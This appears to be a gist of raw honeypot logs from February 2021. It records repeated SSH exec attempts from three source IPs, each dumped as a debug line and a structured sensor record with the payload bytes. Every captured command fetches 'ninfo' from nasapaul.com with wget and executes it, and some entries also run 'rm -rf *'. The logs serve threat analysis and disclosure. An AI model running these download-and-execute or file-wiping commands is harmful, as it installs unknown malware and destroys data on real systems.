@malwaremily
Created February 26, 2021 20:42
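nasapaul security event raw logs

Each event below is logged twice: first a DEBU line dumping the request, then the sensor's structured record (category=ssh, type=ssh-request) with timestamps in UTC. In ssh.payload the first four bytes are the SSH string length prefix (0x41 = 65 bytes, 0x2e = 46 bytes), so the "A" or "." printed directly before the command on the DEBU line is that length byte rendered as text, not part of the command. The ssh.exec field holds the command exactly as the client sent it.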
12:22:55.220 services ▶ DEBU 6472 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de000 {{0 0} [0xc000f48000] 0} 0xc000efa960 {0 0} 0xc000efaa80 0xc000efaf60 0xc000e9c300 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000e95440) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000e953e0) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000433110 {0 0 0 <nil> <nil>} 824633927792}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000032880 0xc000e99a20 0xc000e99a20 false}) %!s(*ssh.buffer=&{0xc000032900 0xc000e99a60 0xc000e99a60 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) Alscpu ; wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo ; rm -rf *
services > ssh > category=ssh, date=2021-02-14 12:22:55.22099094 +0000 UTC m=+1345163.502386732, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=167.99.253.119, source-port=49642, ssh.exec=[]string{"lscpu ; wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo ; rm -rf *"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x41, 0x6c, 0x73, 0x63, 0x70, 0x75, 0x20, 0x3b, 0x20, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x72, 0x6d, 0x20, 0x2d, 0x72, 0x66, 0x20, 0x2a}, ssh.request-type=exec, ssh.sessionid=c0khc7gk9kn000dnacu0, token=c0a8v4ok9kn000dn77n0, type=ssh-request
12:26:30.497 services ▶ DEBU 64db Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de000 {{0 0} [0xc000938000] 0} 0xc00006b080 {0 0} 0xc00006b1a0 0xc00006b2c0 0xc000032080 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc0011d6420) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc0011d63c0) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000482820 {0 0 0 <nil> <nil>} 824649040496}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9c280 0xc00115ee00 0xc00115ee00 false}) %!s(*ssh.buffer=&{0xc000e9c2c0 0xc00115ef20 0xc00115ef20 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) Alscpu ; wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo ; rm -rf *
services > ssh > category=ssh, date=2021-02-14 12:26:30.49813889 +0000 UTC m=+1345378.779534691, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=167.99.253.119, source-port=45348, ssh.exec=[]string{"lscpu ; wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo ; rm -rf *"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x41, 0x6c, 0x73, 0x63, 0x70, 0x75, 0x20, 0x3b, 0x20, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x72, 0x6d, 0x20, 0x2d, 0x72, 0x66, 0x20, 0x2a}, ssh.request-type=exec, ssh.sessionid=c0khdt8k9kn000dnadb0, token=c0a8v4ok9kn000dn77n0, type=ssh-request
15:00:09.483 services ▶ DEBU 6aac Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de000 {{0 0} [0xc000dee000] 0} 0xc000e955c0 {0 0} 0xc000e956e0 0xc000e95740 0xc000e9c200 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc0011d65a0) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc0011d6540) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc001148b20 {0 0 0 <nil> <nil>} 824633927088}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc0000325c0 0xc000e984e0 0xc000e984e0 false}) %!s(*ssh.buffer=&{0xc000032600 0xc000e98520 0xc000e98520 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
services > ssh > category=ssh, date=2021-02-15 15:00:09.484309044 +0000 UTC m=+1440997.765704822, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=64.225.101.223, source-port=52828, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0l8ou0k9kn000dnaj7g, token=c0a8v4ok9kn000dn77n0, type=ssh-request
15:04:27.762 services ▶ DEBU 6b11 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc000ae0840 {{0 0} [0xc001016480] 0} 0xc0011d7260 {0 0} 0xc0011d72c0 0xc0011d7320 0xc000e9cb80 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000efb560) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000efb500) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc0011486f8 {0 0 0 <nil> <nil>} 824633929008}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000032d40 0xc000e99940 0xc000e99940 false}) %!s(*ssh.buffer=&{0xc000032d80 0xc000e99980 0xc000e99980 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
services > ssh > category=ssh, date=2021-02-15 15:04:27.762821171 +0000 UTC m=+1441256.044216965, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=64.225.101.223, source-port=60866, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0l8qugk9kn000dnajk0, token=c0a8v4ok9kn000dn77n0, type=ssh-request
00:52:49.380 services ▶ DEBU 6ce9 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de000 {{0 0} [0xc0000ba240] 0} 0xc0011d6840 {0 0} 0xc0011d69c0 0xc0011d6a20 0xc0000325c0 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000efa4e0) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000efa360) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000039370 {0 0 0 <nil> <nil>} 824649040368}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9c200 0xc000e98540 0xc000e98540 false}) %!s(*ssh.buffer=&{0xc000e9c240 0xc000e98580 0xc000e98580 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
services > ssh > category=ssh, date=2021-02-16 00:52:49.381412233 +0000 UTC m=+1476557.662808034, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=50930, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lheo0k9kn000dnalfg, token=c0a8v4ok9kn000dn77n0, type=ssh-request
00:52:50.686 services ▶ DEBU 6cee Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de160 {{0 0} [0xc000e52180] 0} 0xc0011d6fc0 {0 0} 0xc0011d7020 0xc0011d70e0 0xc0000327c0 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc0011d71a0) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc0011d7140) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000482f90 {0 0 0 <nil> <nil>} 824633927792}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000032880 0xc0011fe9c0 0xc0011fe9c0 false}) %!s(*ssh.buffer=&{0xc000032900 0xc0011fea00 0xc0011fea00 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
services > ssh > category=ssh, date=2021-02-16 00:52:50.686498457 +0000 UTC m=+1476558.967894237, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=56258, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lheo8k9kn000dnalg0, token=c0a8v4ok9kn000dn77n0, type=ssh-request
00:52:58.117 services ▶ DEBU 6cf3 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc000dee000 {{0 0} [0xc0000ba540] 0} 0xc000efade0 {0 0} 0xc000efae40 0xc000efaea0 0xc000e9c500 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000efafc0) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000efaf60) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000039fe8 {0 0 0 <nil> <nil>} 824649041328}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9c5c0 0xc000e98d80 0xc000e98d80 false}) %!s(*ssh.buffer=&{0xc000e9c600 0xc000e98de0 0xc000e98de0 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
services > ssh > category=ssh, date=2021-02-16 00:52:58.117645982 +0000 UTC m=+1476566.399041785, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=59120, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lheq8k9kn000dnalgg, token=c0a8v4ok9kn000dn77n0, type=ssh-request
00:52:59.349 services ▶ DEBU 6cf8 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de580 {{0 0} [0xc000e523c0] 0} 0xc000efb380 {0 0} 0xc000efb3e0 0xc000efb440 0xc000e9c700 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc0011d7560) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc0011d7500) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc0004326e8 {0 0 0 <nil> <nil>} 824633929392}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000032ec0 0xc0011feea0 0xc0011feea0 false}) %!s(*ssh.buffer=&{0xc000032f00 0xc0011feee0 0xc0011feee0 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
services > ssh > category=ssh, date=2021-02-16 00:52:59.349959932 +0000 UTC m=+1476567.631356102, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=35994, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lheqgk9kn000dnalh0, token=c0a8v4ok9kn000dn77n0, type=ssh-request
00:53:26.631 services ▶ DEBU 6cfd Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc000dee160 {{0 0} [0xc0000ba900] 0} 0xc0011d76e0 {0 0} 0xc0011d7740 0xc0011d77a0 0xc000033100 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000efb980) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000efb860) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000e91680 {0 0 0 <nil> <nil>} 824649042672}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9cb00 0xc000e99880 0xc000e99880 false}) %!s(*ssh.buffer=&{0xc000e9cb40 0xc000e998c0 0xc000e998c0 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
services > ssh > category=ssh, date=2021-02-16 00:53:26.632099423 +0000 UTC m=+1476594.913495286, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=59004, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lhf18k9kn000dnalhg, token=c0a8v4ok9kn000dn77n0, type=ssh-request
00:53:29.019 services ▶ DEBU 6d02 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc000dee2c0 {{0 0} [0xc000e52600] 0} 0xc0011d7860 {0 0} 0xc0011d78c0 0xc0011d7920 0xc000033240 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc0011d7a40) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc0011d7980) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000433468 {0 0 0 <nil> <nil>} 824633930544}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000033340 0xc0011ff720 0xc0011ff720 false}) %!s(*ssh.buffer=&{0xc000033380 0xc0011ff760 0xc0011ff760 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
services > ssh > category=ssh, date=2021-02-16 00:53:29.019387375 +0000 UTC m=+1476597.300783158, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=41322, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lhf20k9kn000dnali0, token=c0a8v4ok9kn000dn77n0, type=ssh-request
00:53:30.330 services ▶ DEBU 6d07 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de6e0 {{0 0} [0xc0000bac00] 0} 0xc0011d7e00 {0 0} 0xc0011d7e60 0xc0011d7ec0 0xc000033480 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000efbf80) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000efbf20) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc0011486f8 {0 0 0 <nil> <nil>} 824649043760}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9cf40 0xc000e99f60 0xc000e99f60 false}) %!s(*ssh.buffer=&{0xc000e9cf80 0xc000e99fa0 0xc000e99fa0 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
services > ssh > category=ssh, date=2021-02-16 00:53:30.330822166 +0000 UTC m=+1476598.612217958, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=46912, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lhf28k9kn000dnalig, token=c0a8v4ok9kn000dn77n0, type=ssh-request
00:53:32.568 services ▶ DEBU 6d0c Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de840 {{0 0} [0xc0000bad80] 0} 0xc00006be00 {0 0} 0xc00006bec0 0xc00006bf20 0xc000033640 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000e94720) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000e94360) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc001149468 {0 0 0 <nil> <nil>} 824649044464}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9d200 0xc001151c00 0xc001151c00 false}) %!s(*ssh.buffer=&{0xc000e9d240 0xc001151d40 0xc001151d40 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
services > ssh > category=ssh, date=2021-02-16 00:53:32.568412599 +0000 UTC m=+1476600.849808398, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=56648, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lhf2ok9kn000dnalj0, token=c0a8v4ok9kn000dn77n0, type=ssh-request
01:19:33.077 services ▶ DEBU 6fe9 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc000e52420 {{0 0} [0xc0009c0480] 0} 0xc0011d7a40 {0 0} 0xc0011d7aa0 0xc0011d7b00 0xc000032d40 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc0011d7bc0) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc0011d7b60) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000039d28 {0 0 0 <nil> <nil>} 824633929200}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000032e00 0xc0011fec20 0xc0011fec20 false}) %!s(*ssh.buffer=&{0xc000032e40 0xc0011fec60 0xc0011fec60 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
services > ssh > category=ssh, date=2021-02-16 01:19:33.077819662 +0000 UTC m=+1478161.359215439, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=38310, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lhr90k9kn000dnaoeg, token=c0a8v4ok9kn000dn77n0, type=ssh-request
01:19:41.604 services ▶ DEBU 6ff2 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de9a0 {{0 0} [0xc0009c0780] 0} 0xc00006bda0 {0 0} 0xc00006be00 0xc00006bec0 0xc000033200 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc00006bf80) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc00006bf20) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc0004827e0 {0 0 0 <nil> <nil>} 824633930416}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc0000332c0 0xc0011ff500 0xc0011ff500 false}) %!s(*ssh.buffer=&{0xc000033300 0xc0011ff540 0xc0011ff540 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
services > ssh > category=ssh, date=2021-02-16 01:19:41.605220152 +0000 UTC m=+1478169.886615964, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=46416, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lhrb0k9kn000dnaofg, token=c0a8v4ok9kn000dn77n0, type=ssh-request
